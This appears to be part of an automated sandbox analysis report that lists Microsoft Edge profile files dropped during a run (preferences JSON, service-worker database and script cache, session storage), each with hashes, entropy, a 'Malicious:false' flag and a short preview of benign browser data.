                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2fd32.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF37262.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                              Entropy (8bit):5.567332610294245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:O4biuUWPxZftI8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2DPE8rwU2p8ftur:O4biuUWPxZftIu1ja3DE1+ftE
                                                                                                                                                                                                                                                                              MD5:6A0E894DD7C4EC49A9D96BB1A55B5796
                                                                                                                                                                                                                                                                              SHA1:748B0908F3ECD3B4EF79DD8B499033E19C03AA1A
                                                                                                                                                                                                                                                                              SHA-256:1A90647A66DBB407C24BFB63C7AC206F32B7084FCF0B4C6A270CB935681EB414
                                                                                                                                                                                                                                                                              SHA-512:605AB18E140E4D1D3EBC55449AB3E629F70E29D7259418E8A80EE6474D66AAD730EA4031D9ECCF07ED89F033CC6CABF2D446A00659CF4B4D67A80C5F6FB4ACC8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2b0a8.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                              Entropy (8bit):5.567332610294245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:O4biuUWPxZftI8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2DPE8rwU2p8ftur:O4biuUWPxZftIu1ja3DE1+ftE
                                                                                                                                                                                                                                                                              MD5:6A0E894DD7C4EC49A9D96BB1A55B5796
                                                                                                                                                                                                                                                                              SHA1:748B0908F3ECD3B4EF79DD8B499033E19C03AA1A
                                                                                                                                                                                                                                                                              SHA-256:1A90647A66DBB407C24BFB63C7AC206F32B7084FCF0B4C6A270CB935681EB414
                                                                                                                                                                                                                                                                              SHA-512:605AB18E140E4D1D3EBC55449AB3E629F70E29D7259418E8A80EE6474D66AAD730EA4031D9ECCF07ED89F033CC6CABF2D446A00659CF4B4D67A80C5F6FB4ACC8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2294
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8300418887672265
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:F2xc5Nmucncmo0CRORpllg2DDfRH+VdCRORpllg2NLTqKCRORpllg2DGRH+ECRO1:F2em/trdDDfBwXrdJNrdDGBXrd5Bl
                                                                                                                                                                                                                                                                              MD5:B2326B417F797B3D1AA172A6015D7520
                                                                                                                                                                                                                                                                              SHA1:3EBBB9353E1CC9AF95ED1CA5A5299AF220D8E254
                                                                                                                                                                                                                                                                              SHA-256:057093E07FBFC77F7ADF209F22D14A9E1CDFBC47A7ADEE78CA1642006DC27954
                                                                                                                                                                                                                                                                              SHA-512:F382CE887582CFF8BFE92CFBB1757F671FCBAD3D11F6265417FFF7CEB2F7ACC790B7B8A276FDB1ECB50735E635BBAADA8BA30AC62ABE2593D5BB81CB98C089A7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.Y|.m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):305
                                                                                                                                                                                                                                                                              Entropy (8bit):5.10957809131782
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6:PXfxh1cNwi23oH+TcwtE/a252KLl1XfxHpM+q2PcNwi23oH+TcwtE/a2ZIFUv:RvZYeb8xL5C+vLZYeb8J2FUv
                                                                                                                                                                                                                                                                              MD5:DB5BCB399471E33EE348DF81EF6DA704
                                                                                                                                                                                                                                                                              SHA1:51F4423B56C7E5BD98650D7B3BA42FDC4C9B83B9
                                                                                                                                                                                                                                                                              SHA-256:D29FB117FD7049BB58D0DD3F3EB17F8BD2C54387AFA517862CF7DB3C04FBADB6
                                                                                                                                                                                                                                                                              SHA-512:31DFFABFA205EF90BF1C468DEFFBF551E85AE2DCADB6E6DA6ED507100DC6DBFEC155C3245052B4BEA47A0AD6280E34F9ED8AFBF5E490F4522C09D3778B411F37
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:2024/12/20-02:42:27.928 1aac Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/20-02:42:27.938 1aac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):114579
                                                                                                                                                                                                                                                                              Entropy (8bit):5.579716861969507
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsyIZ7Qg/a9K:J9LyxPXfOxr1lMe1nL/5L/TXE6W7vN
                                                                                                                                                                                                                                                                              MD5:3CA93201B6EEF42327ED9066A80743CB
                                                                                                                                                                                                                                                                              SHA1:22B800BBE2FDDB9CC21F46B45352FA215C20916F
                                                                                                                                                                                                                                                                              SHA-256:2DAB16EFF68D7078C1C45565273A2DB1303DC5DA02731C665CF16CEF79CD0B5E
                                                                                                                                                                                                                                                                              SHA-512:A0D65789B6B05F125B632C1BE78A1D2BDF1DB7CAA24100EA196918B671659E32053312DB269185A250DCADD055C9529D476EDAA3985433F0E6B758000656C096
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):189081
                                                                                                                                                                                                                                                                              Entropy (8bit):6.386237234247522
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:JZuNq/aW9LqwcUI0bQ46L/uyToG4va9UVFw4euUNLLl:SCqwcKbaL/5s+98Al
                                                                                                                                                                                                                                                                              MD5:38E7CB7CEE4E483F3FB81FC7777EE964
                                                                                                                                                                                                                                                                              SHA1:406CFC68AEFF9FB90352A552B11201924355A1DF
                                                                                                                                                                                                                                                                              SHA-256:24D13D1D8E2CDD7334A4A07C325BE8D6F64475BABE2FDE6222B02FFFEDC491FD
                                                                                                                                                                                                                                                                              SHA-512:41350A1D143B8A67F2ADA7272C3ED6C805BCA3259A882B40B7954A13D4997CD776F403F1C0109314B30EA144B6FDF4453A62D1037D0C9C8D762E6887AE72313B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:0\r..m..........rSG.....0....z3.................;.....x.@........,T.8..`,.....L`.....,T...`......L`......Rc........exports...RcJ......module....Rc.Q*.....define....Rb^..-....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m...~.b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                              Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                              MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                              SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                              SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                              SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:0\r..m..................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                              Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Yh56XTXl/lYV/lxEstllQZ4n1:YhOjYWs+G1
                                                                                                                                                                                                                                                                              MD5:F743ADD09711E120BB77A98B1E74D6C3
                                                                                                                                                                                                                                                                              SHA1:04B5E4EF6921DC3389B0C4B10C43A3D089315D2E
                                                                                                                                                                                                                                                                              SHA-256:44FB29EA370C35AD5699DC0F100AECF387F3C30A50AE40A29A5E99B3CC7C97ED
                                                                                                                                                                                                                                                                              SHA-512:AC594DF7641C1756757206D9E9E775720FEFFD0EA50021B8C040819D70D1575C74B07147E9CBE03E6FCDF9DB7E271B04E2D05FE0A10AB687814226A808F63C0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:@...mD..oy retne.........................X....,..................r.E./.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                              Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Yh56XTXl/lYV/lxEstllQZ4n1:YhOjYWs+G1
                                                                                                                                                                                                                                                                              MD5:F743ADD09711E120BB77A98B1E74D6C3
                                                                                                                                                                                                                                                                              SHA1:04B5E4EF6921DC3389B0C4B10C43A3D089315D2E
                                                                                                                                                                                                                                                                              SHA-256:44FB29EA370C35AD5699DC0F100AECF387F3C30A50AE40A29A5E99B3CC7C97ED
                                                                                                                                                                                                                                                                              SHA-512:AC594DF7641C1756757206D9E9E775720FEFFD0EA50021B8C040819D70D1575C74B07147E9CBE03E6FCDF9DB7E271B04E2D05FE0A10AB687814226A808F63C0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:@...mD..oy retne.........................X....,..................r.E./.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF2eeea.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                                                              Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Yh56XTXl/lYV/lxEstllQZ4n1:YhOjYWs+G1
                                                                                                                                                                                                                                                                              MD5:F743ADD09711E120BB77A98B1E74D6C3
                                                                                                                                                                                                                                                                              SHA1:04B5E4EF6921DC3389B0C4B10C43A3D089315D2E
                                                                                                                                                                                                                                                                              SHA-256:44FB29EA370C35AD5699DC0F100AECF387F3C30A50AE40A29A5E99B3CC7C97ED
                                                                                                                                                                                                                                                                              SHA-512:AC594DF7641C1756757206D9E9E775720FEFFD0EA50021B8C040819D70D1575C74B07147E9CBE03E6FCDF9DB7E271B04E2D05FE0A10AB687814226A808F63C0A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:@...mD..oy retne.........................X....,..................r.E./.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):432
                                                                                                                                                                                                                                                                              Entropy (8bit):4.351123185103311
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:S+a8ljljljljlSllcajfCMeyI9hdSkAvkAvkAv:Ra0ZZZZSllcaYRhdSk8k8k8
                                                                                                                                                                                                                                                                              MD5:8D957FD7A344C934F1DD32CBAB689F2D
                                                                                                                                                                                                                                                                              SHA1:51659DDFFE1279A4DDA2C8CBC3DAEC8C5B520AE8
                                                                                                                                                                                                                                                                              SHA-256:3E484C881A73A86A1E3E5C911E068A7DC646602D63E3C613FCEDA1629E7D2BA9
                                                                                                                                                                                                                                                                              SHA-512:3298691111F215FB56C886B3929306D826A7D6CE634D10E076168F10418638DCA2940D6FFB4A15D010621DEF1DDA5BD4079A632A63DC34A0854070DE7151F798
                                                                                                                                                                                                                                                                              Malicious:false
